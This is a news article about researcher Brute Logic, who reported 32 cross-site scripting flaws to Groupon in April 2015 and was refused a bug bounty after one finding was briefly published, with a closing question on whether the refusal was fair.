Bounty programs benefit everyone. Companies like Microsoft get help from security experts, customers gain improved security, and those who discover and report vulnerabilities reap the rewards financially. Or at least that's how things are supposed to work.
Having reported a series of security problems to discount and deal site Groupon, security researcher Brute Logic from XSSposed.org was expecting a pay-out -- but the site refuses to stump up the cash. In all, Brute Logic reported more than 30 security issues with Groupon's site, but the company cites its Responsible Disclosure policy as the reason for not handing over the cash.
The story starts a few days ago when Brute Logic discovered 32 XSS (cross-site scripting) issues affecting Groupon. He says they were particularly serious as they existed at the root of the site and could be easily exploited with a malicious URL. Brute Logic says that the security issue is all the more serious because Groupon stores credit card details, and it would be incredibly easy to craft a spoof Groupon-related URL to trick victims into visiting a fake site.
On 17 April he contacted Groupon to report the problems and heard back almost immediately with a note saying that the company would investigate and report back shortly. The security team then got back saying that it has managed to isolate the issue and would be back in touch once a patch has been produced.
Brute Logic enquired about the level of financial reward that might be offered, and Groupon responded by saying that the bounty was calculated on a case by case basis, promising to "circle back" with details of what could be offered in this instance.
As a contributor to XSSposed.org Brute Logic spoke with people at the site and a reference to one of the security issues ended up being published. This only appeared online for a few moments, and was removed after it was realised it has been published in error. But Groupon is using this as a reason for refusing to pay out.
Groupon's Bug Bounty Program terms say:
Brute Logic argues that that an additional 30 problems still existed and very scant details of the security flaw were published for only a very short time. In a further email, Groupon said:
Understandably Brute Logic is not happy, as his tweets make clear:
32 @Groupon sites affected. They patched them. They refused to pay me. #Bullshit #PleaseRT pic.twitter.com/4j3w2FGFt4April 22, 2015
He also points out that another company, Sucuri Security, was happy to pay out even after a tweet revealed some details of a security flaw in their product.
Does Groupon's decision seem fair to you, or does it smack of wriggling out of making a payment on a technicality?